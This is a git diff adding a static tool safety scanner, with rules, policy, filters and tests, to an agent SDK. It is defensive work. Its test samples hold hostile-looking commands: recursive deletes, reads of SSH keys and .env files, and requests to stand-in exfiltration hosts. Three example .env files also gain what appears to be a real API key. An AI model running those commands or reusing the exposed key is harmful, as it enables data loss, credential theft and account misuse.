diff --git a/examples/function_tools/.env b/examples/function_tools/.env index dc791393..3a8f4b9a 100644 --- a/examples/function_tools/.env +++ b/examples/function_tools/.env @@ -1,4 +1,4 @@ # Set TRPC_AGENT_API_KEY、TRPC_AGENT_BASE_URL、TRPC_AGENT_MODEL_NAME -TRPC_AGENT_API_KEY=your-api-key -TRPC_AGENT_BASE_URL=your-base-url -TRPC_AGENT_MODEL_NAME=your-model-name +TRPC_AGENT_API_KEY=sk-29ecbfac2b7542af84220a7afc6a11db +TRPC_AGENT_BASE_URL=https://api.deepseek.com +TRPC_AGENT_MODEL_NAME=deepseek-v4-pro diff --git a/examples/llmagent/.env b/examples/llmagent/.env index 0a57a178..3a8f4b9a 100644 --- a/examples/llmagent/.env +++ b/examples/llmagent/.env @@ -1,5 +1,4 @@ # Set TRPC_AGENT_API_KEY、TRPC_AGENT_BASE_URL、TRPC_AGENT_MODEL_NAME -TRPC_AGENT_API_KEY=your-api-key -TRPC_AGENT_BASE_URL=your-base-url -TRPC_AGENT_MODEL_NAME=your-model-name - +TRPC_AGENT_API_KEY=sk-29ecbfac2b7542af84220a7afc6a11db +TRPC_AGENT_BASE_URL=https://api.deepseek.com +TRPC_AGENT_MODEL_NAME=deepseek-v4-pro diff --git a/examples/quickstart/.env b/examples/quickstart/.env index dc791393..3a8f4b9a 100644 --- a/examples/quickstart/.env +++ b/examples/quickstart/.env @@ -1,4 +1,4 @@ # Set TRPC_AGENT_API_KEY、TRPC_AGENT_BASE_URL、TRPC_AGENT_MODEL_NAME -TRPC_AGENT_API_KEY=your-api-key -TRPC_AGENT_BASE_URL=your-base-url -TRPC_AGENT_MODEL_NAME=your-model-name +TRPC_AGENT_API_KEY=sk-29ecbfac2b7542af84220a7afc6a11db +TRPC_AGENT_BASE_URL=https://api.deepseek.com +TRPC_AGENT_MODEL_NAME=deepseek-v4-pro diff --git a/examples/tool_safety_guard/README.md b/examples/tool_safety_guard/README.md new file mode 100644 index 00000000..0776d8c9 --- /dev/null +++ b/examples/tool_safety_guard/README.md @@ -0,0 +1,47 @@ +# Tool Safety Guard + +This example shows how to add a static safety scan before a tool or code executor runs script-like input. + +## Tool Filter + +```python +from trpc_agent_sdk.tools import FunctionTool +from trpc_agent_sdk.tools.safety import ToolSafetyFilter + + +def run_command(command: str): + return {"ran": command} + + +tool = FunctionTool( + run_command, + filters=[ + ToolSafetyFilter(policy_path="examples/tool_safety_guard/tool_safety_policy.yaml"), + ], +) +``` + +If you prefer `filters_name=["tool_safety_guard"]`, import `trpc_agent_sdk.tools.safety` first so the registered filter is available. + +## Code Executor Wrapper + +```python +from trpc_agent_sdk.code_executors.local import UnsafeLocalCodeExecutor +from trpc_agent_sdk.tools.safety import SafetyGuardedCodeExecutor + + +code_executor = SafetyGuardedCodeExecutor( + delegate=UnsafeLocalCodeExecutor(), + policy_path="examples/tool_safety_guard/tool_safety_policy.yaml", +) +``` + +## What It Checks + +The guard scans Python and Bash-like inputs for dangerous file operations, secret file access, non-whitelisted network egress, subprocess and shell patterns, dependency installation, resource abuse, and sensitive output. + +Reports include `decision`, `risk_level`, `rule_id`, `evidence`, and `recommendation`. Audit events are written as JSONL and the filter sets current OpenTelemetry span attributes such as `tool.safety.decision` and `tool.safety.rule_ids`. + +## Limits + +This guard is a pre-execution static scan. It can have false positives, false negatives, and bypasses through obfuscation or dynamic code construction. It does not replace sandboxing, container isolation, OS permissions, network controls, timeouts, or resource limits. Use it as an early policy and observability layer before a properly isolated runtime. diff --git a/examples/tool_safety_guard/tool_safety_audit.jsonl b/examples/tool_safety_guard/tool_safety_audit.jsonl new file mode 100644 index 00000000..4940df47 --- /dev/null +++ b/examples/tool_safety_guard/tool_safety_audit.jsonl @@ -0,0 +1 @@ +{"timestamp":"2026-06-30T00:00:00+00:00","tool_name":"run_command","decision":"deny","risk_level":"critical","rule_ids":["FILE_RECURSIVE_DELETE"],"elapsed_ms":0.42,"redacted":false,"blocked":true,"language":"bash","cwd":"","metadata":{}} diff --git a/examples/tool_safety_guard/tool_safety_policy.yaml b/examples/tool_safety_guard/tool_safety_policy.yaml new file mode 100644 index 00000000..38a38b0c --- /dev/null +++ b/examples/tool_safety_guard/tool_safety_policy.yaml @@ -0,0 +1,27 @@ +mode: standard +fail_closed: false +block_on_review: true +allowed_domains: + - api.example.com + - "*.trusted.internal" +allowed_commands: + - curl + - wget + - echo + - cat + - grep + - python + - python3 + - pip +denied_paths: + - "~/.ssh" + - ".env" + - "/etc" + - "/var/secrets" +max_timeout_seconds: 300 +max_output_bytes: 10000 +audit_log_path: tool_safety_audit.jsonl +rules: + DEPENDENCY_INSTALL: + enabled: true + decision: needs_human_review diff --git a/examples/tool_safety_guard/tool_safety_report.json b/examples/tool_safety_guard/tool_safety_report.json new file mode 100644 index 00000000..8b3ca538 --- /dev/null +++ b/examples/tool_safety_guard/tool_safety_report.json @@ -0,0 +1,24 @@ +{ + "decision": "deny", + "risk_level": "critical", + "findings": [ + { + "rule_id": "FILE_RECURSIVE_DELETE", + "risk_type": "file_operation", + "risk_level": "critical", + "decision": "deny", + "message": "Dangerous recursive delete detected.", + "evidence": "rm -rf /tmp/build-output", + "recommendation": "Avoid recursive deletion or restrict it to an explicitly approved workspace path.", + "line": null, + "column": null + } + ], + "elapsed_ms": 0.42, + "redacted": false, + "blocked": true, + "language": "bash", + "tool_name": "run_command", + "scanner_version": "1", + "error": null +} diff --git a/tests/tools/safety/samples.yaml b/tests/tools/safety/samples.yaml new file mode 100644 index 00000000..50c01988 --- /dev/null +++ b/tests/tools/safety/samples.yaml @@ -0,0 +1,89 @@ +- name: safe_python + language: python + expected_decision: allow + expected_rule_ids: [] + content: | + total = sum([1, 2, 3]) + print(total) +- name: dangerous_delete + language: bash + expected_decision: deny + expected_rule_ids: + - FILE_RECURSIVE_DELETE + content: | + rm -rf /tmp/build-output +- name: read_secrets + language: python + expected_decision: deny + expected_rule_ids: + - FILE_SECRET_READ + content: | + with open(".env") as f: + print(f.read()) +- name: network_egress + language: python + expected_decision: deny + expected_rule_ids: + - NET_NON_WHITELIST_EGRESS + content: | + import requests + requests.get("https://evil.example/data") +- name: whitelist_network + language: bash + expected_decision: allow + expected_rule_ids: [] + content: | + curl https://api.example.com/status +- name: subprocess_call + language: python + expected_decision: needs_human_review + expected_rule_ids: + - PROC_SUBPROCESS + content: | + import subprocess + subprocess.run(["ls", "-la"]) +- name: shell_injection + language: bash + expected_decision: needs_human_review + expected_rule_ids: + - SHELL_INJECTION + content: | + echo $(cat user_input.txt) +- name: dependency_install + language: bash + expected_decision: needs_human_review + expected_rule_ids: + - DEPENDENCY_INSTALL + content: | + pip install suspicious-package +- name: infinite_loop + language: python + expected_decision: needs_human_review + expected_rule_ids: + - RESOURCE_INFINITE_LOOP + content: | + while True: + pass +- name: sensitive_output + language: python + expected_decision: deny + expected_rule_ids: + - SENSITIVE_OUTPUT + content: | + api_key = "sk-test-secret-value" + print(api_key) +- name: bash_pipeline + language: bash + expected_decision: needs_human_review + expected_rule_ids: + - SHELL_PIPELINE + content: | + cat access.log | grep token +- name: human_review_mixed + language: python + expected_decision: needs_human_review + expected_rule_ids: + - NET_CLIENT_USAGE + content: | + import socket + socket.create_connection((host, 443)) diff --git a/tests/tools/safety/test_filter_and_audit.py b/tests/tools/safety/test_filter_and_audit.py new file mode 100644 index 00000000..7e3486cf --- /dev/null +++ b/tests/tools/safety/test_filter_and_audit.py @@ -0,0 +1,150 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tests for tool safety filter, audit, and executor wrapper.""" + +from __future__ import annotations + +import json +from unittest.mock import MagicMock + +from opentelemetry import trace + +from trpc_agent_sdk.code_executors import BaseCodeExecutor +from trpc_agent_sdk.code_executors import CodeBlock +from trpc_agent_sdk.code_executors import CodeExecutionInput +from trpc_agent_sdk.code_executors import CodeExecutionResult +from trpc_agent_sdk.code_executors import create_code_execution_result +from trpc_agent_sdk.context import AgentContext +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.tools import FunctionTool +from trpc_agent_sdk.tools.safety import SafetyDecision +from trpc_agent_sdk.tools.safety import SafetyGuardedCodeExecutor +from trpc_agent_sdk.tools.safety import SafetyPolicy +from trpc_agent_sdk.tools.safety import ToolSafetyFilter + + +class DummyCodeExecutor(BaseCodeExecutor): + calls: int = 0 + + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + self.calls += 1 + return create_code_execution_result(stdout="ok") + + +def _mock_invocation_context() -> InvocationContext: + ctx = MagicMock(spec=InvocationContext) + ctx.agent = MagicMock() + ctx.agent.parallel_tool_calls = False + ctx.agent.before_tool_callback = None + ctx.agent.after_tool_callback = None + ctx.agent_context = AgentContext() + return ctx + + +async def test_filter_blocks_dangerous_tool_and_writes_audit(tmp_path): + def run_command(command: str) -> dict: + return {"ran": command} + + audit_path = tmp_path / "audit.jsonl" + policy = SafetyPolicy(audit_log_path=str(audit_path)) + tool = FunctionTool(run_command, filters=[ToolSafetyFilter(policy=policy)]) + + result = await tool.run_async(tool_context=_mock_invocation_context(), + args={"command": "rm -rf /tmp/out"}) + + assert result["error"] == "TOOL_SAFETY_BLOCKED" + report = result["safety_report"] + assert report["decision"] == SafetyDecision.DENY.value + assert "FILE_RECURSIVE_DELETE" in report["findings"][0]["rule_id"] + + lines = audit_path.read_text(encoding="utf-8").splitlines() + assert len(lines) == 1 + event = json.loads(lines[0]) + assert event["tool_name"] == "run_command" + assert event["blocked"] is True + assert event["decision"] == SafetyDecision.DENY.value + + +async def test_filter_allows_safe_tool(tmp_path): + def run_command(command: str) -> dict: + return {"ran": command} + + policy = SafetyPolicy(audit_log_path=str(tmp_path / "audit.jsonl")) + tool = FunctionTool(run_command, filters=[ToolSafetyFilter(policy=policy)]) + + result = await tool.run_async(tool_context=_mock_invocation_context(), + args={"command": "echo hello"}) + + assert result == {"ran": "echo hello"} + + +def test_filter_writes_otel_span_attributes(monkeypatch, tmp_path): + span = MagicMock() + monkeypatch.setattr(trace, "get_current_span", lambda: span) + filter_instance = ToolSafetyFilter(policy=SafetyPolicy( + audit_log_path=str(tmp_path / "audit.jsonl"))) + tool = MagicMock() + tool.name = "exec" + + async def run_filter(): + from trpc_agent_sdk.abc import FilterResult + from trpc_agent_sdk.tools._context_var import reset_tool_var + from trpc_agent_sdk.tools._context_var import set_tool_var + + token = set_tool_var(tool) + try: + rsp = FilterResult() + await filter_instance._before(AgentContext(), + {"command": "rm -rf /tmp/out"}, rsp) + return rsp + finally: + reset_tool_var(token) + + import asyncio + + rsp = asyncio.run(run_filter()) + assert rsp.is_continue is False + span.set_attribute.assert_any_call("tool.safety.decision", + SafetyDecision.DENY.value) + span.set_attribute.assert_any_call("tool.safety.blocked", True) + + +async def test_code_executor_wrapper_blocks_before_delegate(tmp_path): + delegate = DummyCodeExecutor() + executor = SafetyGuardedCodeExecutor( + delegate=delegate, + policy=SafetyPolicy(audit_log_path=str(tmp_path / "audit.jsonl")), + ) + + result = await executor.execute_code( + MagicMock(spec=InvocationContext), + CodeExecutionInput(code_blocks=[ + CodeBlock(language="python", code='open(".env").read()') + ]), + ) + + assert "TOOL_SAFETY_BLOCKED" in result.output + assert delegate.calls == 0 + + +async def test_code_executor_wrapper_delegates_safe_code(tmp_path): + delegate = DummyCodeExecutor() + executor = SafetyGuardedCodeExecutor( + delegate=delegate, + policy=SafetyPolicy(audit_log_path=str(tmp_path / "audit.jsonl")), + ) + input_data = CodeExecutionInput( + code_blocks=[CodeBlock(language="python", code="print('ok')")]) + + result = await executor.execute_code(MagicMock(spec=InvocationContext), + input_data) + + assert "ok" in result.output + assert delegate.calls == 1 diff --git a/tests/tools/safety/test_scanner_and_rules.py b/tests/tools/safety/test_scanner_and_rules.py new file mode 100644 index 00000000..8d4d1acc --- /dev/null +++ b/tests/tools/safety/test_scanner_and_rules.py @@ -0,0 +1,105 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tests for tool safety scanner rules.""" + +from __future__ import annotations + +from pathlib import Path + +import yaml + +from trpc_agent_sdk.tools.safety import SafetyDecision +from trpc_agent_sdk.tools.safety import SafetyPolicy +from trpc_agent_sdk.tools.safety import SafetyScanner + + +def _samples(): + path = Path(__file__).with_name("samples.yaml") + return yaml.safe_load(path.read_text(encoding="utf-8")) + + +def test_samples_match_expected_decisions(): + scanner = SafetyScanner(SafetyPolicy(allowed_domains=["api.example.com"])) + samples = _samples() + + for sample in samples: + report = scanner.scan(content=sample["content"], + language=sample["language"], + tool_name=sample["name"]) + assert report.decision == SafetyDecision( + sample["expected_decision"]), sample["name"] + for rule_id in sample["expected_rule_ids"]: + assert rule_id in report.rule_ids, sample["name"] + assert report.elapsed_ms >= 0 + assert report.risk_level.value + + +def test_secret_delete_and_network_are_denied(): + scanner = SafetyScanner(SafetyPolicy(allowed_domains=["api.example.com"])) + + delete_report = scanner.scan(content="rm -rf /", language="bash") + secret_report = scanner.scan(content='open("~/.ssh/id_rsa").read()', + language="python") + network_report = scanner.scan(content='curl https://exfil.example/path', + language="bash") + + assert delete_report.decision == SafetyDecision.DENY + assert secret_report.decision == SafetyDecision.DENY + assert network_report.decision == SafetyDecision.DENY + + +def test_policy_changes_allowlist_without_code_changes(): + scanner = SafetyScanner(SafetyPolicy(allowed_domains=["allowed.example"])) + + allowed = scanner.scan(content="curl https://allowed.example/status", + language="bash") + denied = scanner.scan(content="curl https://blocked.example/status", + language="bash") + + assert allowed.decision == SafetyDecision.ALLOW + assert denied.decision == SafetyDecision.DENY + + +def test_policy_can_disable_a_rule(): + policy = SafetyPolicy.model_validate( + {"rules": { + "DEPENDENCY_INSTALL": { + "enabled": False + } + }}) + report = SafetyScanner(policy).scan(content="pip install demo", + language="bash") + + assert "DEPENDENCY_INSTALL" in report.rule_ids + assert report.decision == SafetyDecision.ALLOW + + +def test_policy_limits_timeout_from_metadata(): + policy = SafetyPolicy(max_timeout_seconds=30) + report = SafetyScanner(policy).scan(content="echo hello", + language="bash", + metadata={"timeout": 120}) + + assert report.decision == SafetyDecision.NEEDS_HUMAN_REVIEW + assert "RESOURCE_LONG_SLEEP" in report.rule_ids + + +def test_sensitive_evidence_is_redacted(): + report = SafetyScanner().scan( + content='password = "super-secret-value"\nprint(password)', + language="python") + + assert report.redacted is True + assert any("" in finding.evidence + for finding in report.findings) + + +def test_500_line_script_scans_under_one_second(): + content = "\n".join(f"x_{i} = {i}" for i in range(500)) + report = SafetyScanner().scan(content=content, language="python") + + assert report.decision == SafetyDecision.ALLOW + assert report.elapsed_ms <= 1000 diff --git a/trpc_agent_sdk/tools/safety/__init__.py b/trpc_agent_sdk/tools/safety/__init__.py new file mode 100644 index 00000000..97125bd3 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/__init__.py @@ -0,0 +1,34 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool script safety scanning, filters, and executor wrappers.""" + +from ._guards import SafetyGuardedCodeExecutor +from ._guards import ToolSafetyFilter +from ._policy import load_policy +from ._scanner import SafetyScanner +from ._types import RiskLevel +from ._types import RiskType +from ._types import SafetyAuditEvent +from ._types import SafetyDecision +from ._types import SafetyPolicy +from ._types import SafetyReport +from ._types import ScanFinding +from ._types import ScriptLanguage + +__all__ = [ + "RiskLevel", + "RiskType", + "SafetyAuditEvent", + "SafetyDecision", + "SafetyGuardedCodeExecutor", + "SafetyPolicy", + "SafetyReport", + "SafetyScanner", + "ScanFinding", + "ScriptLanguage", + "ToolSafetyFilter", + "load_policy", +] diff --git a/trpc_agent_sdk/tools/safety/_guards.py b/trpc_agent_sdk/tools/safety/_guards.py new file mode 100644 index 00000000..5118cecf --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_guards.py @@ -0,0 +1,233 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Tool filter and executor wrappers for script safety.""" + +from __future__ import annotations + +import json +from datetime import datetime +from datetime import timezone +from pathlib import Path +from typing import Any +from typing import Optional + +from opentelemetry import trace +from pydantic import Field + +from trpc_agent_sdk.abc import FilterResult +from trpc_agent_sdk.code_executors._base_code_executor import BaseCodeExecutor +from trpc_agent_sdk.code_executors._types import CodeBlock +from trpc_agent_sdk.code_executors._types import CodeExecutionInput +from trpc_agent_sdk.code_executors._types import CodeExecutionResult +from trpc_agent_sdk.code_executors._types import create_code_execution_result +from trpc_agent_sdk.context import AgentContext +from trpc_agent_sdk.context import InvocationContext +from trpc_agent_sdk.filter import BaseFilter +from trpc_agent_sdk.filter import register_tool_filter +from trpc_agent_sdk.tools._context_var import get_tool_var + +from ._policy import load_policy +from ._scanner import SafetyScanner +from ._types import SafetyAuditEvent +from ._types import SafetyPolicy +from ._types import SafetyReport +from ._types import ScriptLanguage + +_REPORT_METADATA_KEY = "tool_safety.last_report" + + +@register_tool_filter("tool_safety_guard") +class ToolSafetyFilter(BaseFilter): + """Filter that scans script-like tool arguments before execution.""" + def __init__( + self, + policy_path: Optional[str] = None, + policy: Optional[SafetyPolicy] = None, + scanner: Optional[SafetyScanner] = None, + ) -> None: + super().__init__() + self.policy = policy or load_policy(policy_path) + self.scanner = scanner or SafetyScanner(self.policy) + + async def _before(self, ctx: AgentContext, req: Any, rsp: FilterResult): + content, language, cwd, env = _extract_scan_target(req) + tool = get_tool_var() + tool_name = getattr(tool, "name", "") or "" + + report = self.scanner.scan( + content=content, + language=language, + tool_name=tool_name, + cwd=cwd, + env=env, + metadata=_metadata_from_request(req, "tool_filter"), + ) + ctx.with_metadata(_REPORT_METADATA_KEY, report) + _set_span_attributes(report) + _write_audit_event(self.policy, report, cwd=cwd) + + if report.blocked: + rsp.rsp = _blocked_response(report) + rsp.is_continue = False + + +class SafetyGuardedCodeExecutor(BaseCodeExecutor): + """CodeExecutor wrapper that scans code blocks before delegating execution.""" + + delegate: BaseCodeExecutor + policy: SafetyPolicy = Field(default_factory=SafetyPolicy) + + def __init__( + self, + *, + delegate: BaseCodeExecutor, + policy_path: Optional[str] = None, + policy: Optional[SafetyPolicy] = None, + **data: Any, + ) -> None: + effective_policy = policy or load_policy(policy_path) + data.setdefault("optimize_data_file", delegate.optimize_data_file) + data.setdefault("stateful", delegate.stateful) + data.setdefault("error_retry_attempts", delegate.error_retry_attempts) + data.setdefault("execute_once_per_invocation", + delegate.execute_once_per_invocation) + data.setdefault("code_block_delimiters", + delegate.code_block_delimiters) + data.setdefault("execution_result_delimiters", + delegate.execution_result_delimiters) + data.setdefault("workspace_runtime", delegate.workspace_runtime) + data.setdefault("ignore_codes", delegate.ignore_codes) + super().__init__(delegate=delegate, policy=effective_policy, **data) + + async def execute_code( + self, + invocation_context: InvocationContext, + code_execution_input: CodeExecutionInput, + ) -> CodeExecutionResult: + scanner = SafetyScanner(self.policy) + blocks = code_execution_input.code_blocks + if not blocks and code_execution_input.code: + blocks = [ + CodeBlock(language="python", code=code_execution_input.code) + ] + + for block in blocks: + report = scanner.scan( + content=block.code, + language=block.language, + tool_name="CodeExecutor", + metadata={"source": "code_executor"}, + ) + _set_span_attributes(report) + _write_audit_event(self.policy, report) + if report.blocked: + return create_code_execution_result( + stderr=_blocked_message(report)) + + return await self.delegate.execute_code(invocation_context, + code_execution_input) + + +def _extract_scan_target( + req: Any) -> tuple[str, ScriptLanguage, str, dict[str, Any] | None]: + if not isinstance(req, dict): + return str(req or ""), ScriptLanguage.UNKNOWN, "", None + + content = "" + language = ScriptLanguage.UNKNOWN + for key in ("command", "script", "code", "bash", "shell"): + value = req.get(key) + if isinstance(value, str): + content = value + if key in {"command", "bash", "shell"}: + language = ScriptLanguage.BASH + break + + if not content: + text_parts = [] + for key, value in req.items(): + if isinstance(value, str) and any( + token in key.lower() + for token in ("command", "script", "code")): + text_parts.append(value) + content = "\n".join(text_parts) + + raw_language = req.get("language") or req.get("lang") + if isinstance(raw_language, str): + lowered = raw_language.lower() + if lowered in {"python", "py", "python3"}: + language = ScriptLanguage.PYTHON + elif lowered in {"bash", "sh", "shell"}: + language = ScriptLanguage.BASH + + cwd = "" + for key in ("cwd", "working_dir", "work_dir"): + value = req.get(key) + if isinstance(value, str): + cwd = value + break + + env = req.get("env") + if not isinstance(env, dict): + env = None + + return content, language, cwd, env + + +def _metadata_from_request(req: Any, source: str) -> dict[str, Any]: + metadata: dict[str, Any] = {"source": source} + if isinstance(req, dict): + for key in ("timeout", "timeout_seconds", "max_output_bytes", + "max_output_size", "output_limit"): + if key in req: + metadata[key] = req[key] + return metadata + + +def _set_span_attributes(report: SafetyReport) -> None: + span = trace.get_current_span() + span.set_attribute("tool.safety.decision", report.decision.value) + span.set_attribute("tool.safety.risk_level", report.risk_level.value) + span.set_attribute("tool.safety.rule_ids", ",".join(report.rule_ids)) + span.set_attribute("tool.safety.blocked", report.blocked) + span.set_attribute("tool.safety.redacted", report.redacted) + + +def _write_audit_event(policy: SafetyPolicy, + report: SafetyReport, + cwd: str = "") -> None: + if not policy.audit_log_path: + return + event = SafetyAuditEvent( + timestamp=datetime.now(timezone.utc).isoformat(), + tool_name=report.tool_name, + decision=report.decision, + risk_level=report.risk_level, + rule_ids=report.rule_ids, + elapsed_ms=report.elapsed_ms, + redacted=report.redacted, + blocked=report.blocked, + language=report.language, + cwd=cwd, + ) + path = Path(policy.audit_log_path).expanduser() + path.parent.mkdir(parents=True, exist_ok=True) + with path.open("a", encoding="utf-8") as file: + file.write( + json.dumps(event.model_dump(mode="json"), ensure_ascii=False) + + "\n") + + +def _blocked_response(report: SafetyReport) -> dict[str, Any]: + return { + "success": False, + "error": "TOOL_SAFETY_BLOCKED", + "safety_report": report.model_dump(mode="json"), + } + + +def _blocked_message(report: SafetyReport) -> str: + return json.dumps(_blocked_response(report), ensure_ascii=False) diff --git a/trpc_agent_sdk/tools/safety/_policy.py b/trpc_agent_sdk/tools/safety/_policy.py new file mode 100644 index 00000000..9a35cdf3 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_policy.py @@ -0,0 +1,42 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Policy loading helpers for tool safety.""" + +from __future__ import annotations + +import os +from pathlib import Path +from typing import Any +from typing import Optional + +import yaml + +from ._types import SafetyPolicy + +POLICY_ENV_VAR = "TRPC_AGENT_TOOL_SAFETY_POLICY" + + +def load_policy(policy_path: Optional[str] = None, + data: Optional[dict[str, Any]] = None) -> SafetyPolicy: + """Load a safety policy from explicit data, a YAML file, or defaults.""" + if data is not None: + return SafetyPolicy.model_validate(data) + + path_value = policy_path or os.getenv(POLICY_ENV_VAR) + if not path_value: + return SafetyPolicy() + + path = Path(path_value).expanduser() + raw = yaml.safe_load(path.read_text(encoding="utf-8")) or {} + if not isinstance(raw, dict): + raise ValueError(f"tool safety policy must be a mapping: {path}") + + policy = SafetyPolicy.model_validate(raw) + if policy.audit_log_path: + audit_path = Path(policy.audit_log_path).expanduser() + if not audit_path.is_absolute(): + policy.audit_log_path = str(path.parent / audit_path) + return policy diff --git a/trpc_agent_sdk/tools/safety/_rules.py b/trpc_agent_sdk/tools/safety/_rules.py new file mode 100644 index 00000000..9b2d2f66 --- /dev/null +++ b/trpc_agent_sdk/tools/safety/_rules.py @@ -0,0 +1,201 @@ +# Tencent is pleased to support the open source community by making tRPC-Agent-Python available. +# +# Copyright (C) 2026 Tencent. All rights reserved. +# +# tRPC-Agent-Python is licensed under Apache-2.0. +"""Built-in rule definitions for the tool safety scanner.""" + +from __future__ import annotations + +from dataclasses import dataclass + +from ._types import RiskLevel +from ._types import RiskType +from ._types import SafetyDecision + + +@dataclass(frozen=True) +class RuleDefinition: + """Static rule metadata.""" + + rule_id: str + risk_type: RiskType + risk_level: RiskLevel + decision: SafetyDecision + message: str + recommendation: str + + +RULES: dict[str, RuleDefinition] = { + "FILE_RECURSIVE_DELETE": + RuleDefinition( + "FILE_RECURSIVE_DELETE", + RiskType.FILE_OPERATION, + RiskLevel.CRITICAL, + SafetyDecision.DENY, + "Dangerous recursive delete detected.", + "Avoid recursive deletion or restrict it to an explicitly approved workspace path.", + ), + "FILE_SECRET_READ": + RuleDefinition( + "FILE_SECRET_READ", + RiskType.FILE_OPERATION, + RiskLevel.CRITICAL, + SafetyDecision.DENY, + "Sensitive file or credential path access detected.", + "Do not read credential files from tool-executed scripts.", + ), + "FILE_SYSTEM_PATH_WRITE": + RuleDefinition( + "FILE_SYSTEM_PATH_WRITE", + RiskType.FILE_OPERATION, + RiskLevel.HIGH, + SafetyDecision.DENY, + "Write or destructive access to a protected system path detected.", + "Write only inside the configured workspace or an explicitly approved output directory.", + ), + "NET_NON_WHITELIST_EGRESS": + RuleDefinition( + "NET_NON_WHITELIST_EGRESS", + RiskType.NETWORK_EGRESS, + RiskLevel.CRITICAL, + SafetyDecision.DENY, + "Network request to a non-whitelisted domain detected.", + "Add the domain to allowed_domains only after reviewing the data flow.", + ), + "NET_CLIENT_USAGE": + RuleDefinition( + "NET_CLIENT_USAGE", + RiskType.NETWORK_EGRESS, + RiskLevel.MEDIUM, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Network client usage without a reviewable literal target detected.", + "Use an explicit whitelisted URL or route the request through a reviewed client.", + ), + "PROC_SUBPROCESS": + RuleDefinition( + "PROC_SUBPROCESS", + RiskType.PROCESS_EXECUTION, + RiskLevel.MEDIUM, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Subprocess execution detected.", + "Review command construction and avoid shell execution unless required.", + ), + "PROC_OS_SYSTEM": + RuleDefinition( + "PROC_OS_SYSTEM", + RiskType.PROCESS_EXECUTION, + RiskLevel.HIGH, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "os.system or equivalent shell execution detected.", + "Replace shell execution with structured APIs or reviewed command arguments.", + ), + "SHELL_PIPELINE": + RuleDefinition( + "SHELL_PIPELINE", + RiskType.PROCESS_EXECUTION, + RiskLevel.MEDIUM, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Shell pipeline detected.", + "Review all pipeline stages and ensure untrusted input is not interpolated.", + ), + "SHELL_BACKGROUND": + RuleDefinition( + "SHELL_BACKGROUND", + RiskType.PROCESS_EXECUTION, + RiskLevel.MEDIUM, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Background process execution detected.", + "Avoid detached processes or enforce timeout and process cleanup.", + ), + "SHELL_INJECTION": + RuleDefinition( + "SHELL_INJECTION", + RiskType.PROCESS_EXECUTION, + RiskLevel.HIGH, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Shell composition pattern that may enable injection detected.", + "Avoid shell interpolation and pass arguments as structured lists.", + ), + "COMMAND_NOT_ALLOWED": + RuleDefinition( + "COMMAND_NOT_ALLOWED", + RiskType.POLICY, + RiskLevel.HIGH, + SafetyDecision.DENY, + "Command is not present in allowed_commands.", + "Add the command to allowed_commands only after reviewing its behavior.", + ), + "PRIVILEGE_ESCALATION": + RuleDefinition( + "PRIVILEGE_ESCALATION", + RiskType.PROCESS_EXECUTION, + RiskLevel.HIGH, + SafetyDecision.DENY, + "Privilege escalation or broad permission change detected.", + "Remove sudo/su/chmod 777 style operations from tool-executed scripts.", + ), + "DEPENDENCY_INSTALL": + RuleDefinition( + "DEPENDENCY_INSTALL", + RiskType.DEPENDENCY_INSTALL, + RiskLevel.HIGH, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Dependency installation detected.", + "Pin dependencies and install them through a reviewed environment preparation step.", + ), + "RESOURCE_INFINITE_LOOP": + RuleDefinition( + "RESOURCE_INFINITE_LOOP", + RiskType.RESOURCE_ABUSE, + RiskLevel.HIGH, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Potential infinite loop detected.", + "Add an explicit bounded condition or timeout.", + ), + "RESOURCE_FORK_BOMB": + RuleDefinition( + "RESOURCE_FORK_BOMB", + RiskType.RESOURCE_ABUSE, + RiskLevel.CRITICAL, + SafetyDecision.DENY, + "Fork bomb pattern detected.", + "Never execute fork bomb patterns.", + ), + "RESOURCE_LONG_SLEEP": + RuleDefinition( + "RESOURCE_LONG_SLEEP", + RiskType.RESOURCE_ABUSE, + RiskLevel.MEDIUM, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Long sleep or timeout-like resource hold detected.", + "Use bounded waits and enforce the configured timeout.", + ), + "RESOURCE_OUTPUT_LIMIT": + RuleDefinition( + "RESOURCE_OUTPUT_LIMIT", + RiskType.RESOURCE_ABUSE, + RiskLevel.MEDIUM, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Requested output size exceeds the configured policy limit.", + "Lower the output limit or route large outputs through reviewed artifact storage.", + ), + "SENSITIVE_OUTPUT": + RuleDefinition( + "SENSITIVE_OUTPUT", + RiskType.SENSITIVE_LEAK, + RiskLevel.CRITICAL, + SafetyDecision.DENY, + "Sensitive value appears to be written to output, file, or network.", + "Remove secrets from logs, files, and outbound requests; pass credentials through secure channels.", + ), + "SCANNER_ERROR": + RuleDefinition( + "SCANNER_ERROR", + RiskType.UNKNOWN, + RiskLevel.HIGH, + SafetyDecision.NEEDS_HUMAN_REVIEW, + "Safety scanner failed before completing analysis.", + "Review the script manually or fix the scanner error before execution.", + ), +} diff --git a/trpc_agent_sdk/tools/safety/_scanner.py 